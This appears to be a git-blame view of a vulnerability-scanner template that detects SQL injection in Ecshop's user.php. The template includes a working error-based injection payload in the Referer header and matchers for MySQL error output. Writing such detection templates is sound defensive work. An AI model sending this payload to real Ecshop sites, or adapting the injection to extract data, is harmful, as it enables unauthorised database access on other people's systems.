2021-11-08 08:12:13 +00:00
|
|
|
id: ecshop-sqli
|
|
|
|
|
2021-11-07 02:03:09 +00:00
|
|
|
info:
|
2021-11-08 08:12:13 +00:00
|
|
|
name: Ecshop SQLi
|
2021-11-07 02:03:09 +00:00
|
|
|
author: Lark-lab,ImNightmaree
|
2021-11-08 08:12:13 +00:00
|
|
|
severity: high
|
2021-11-23 10:09:00 +00:00
|
|
|
description: A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field.
|
2021-11-08 08:12:13 +00:00
|
|
|
reference:
|
|
|
|
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
|
|
|
|
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
2021-11-08 10:15:54 +00:00
|
|
|
tags: sqli,php,ecshop
|
2021-11-07 02:03:09 +00:00
|
|
|
|
2021-11-07 02:30:38 +00:00
|
|
|
requests:
|
2021-11-07 02:03:09 +00:00
|
|
|
- raw:
|
2021-11-07 02:36:28 +00:00
|
|
|
- |
|
2021-11-08 08:12:13 +00:00
|
|
|
GET /user.php?act=login HTTP/1.1
|
2021-11-07 02:03:09 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-11-08 08:12:44 +00:00
|
|
|
- 'XPATH syntax error:'
|
2021-11-08 08:12:13 +00:00
|
|
|
- '[error] =>'
|
|
|
|
- '[0] => Array'
|
|
|
|
- 'MySQL server error report:Array'
|
2021-11-07 02:39:21 +00:00
|
|
|
condition: and
|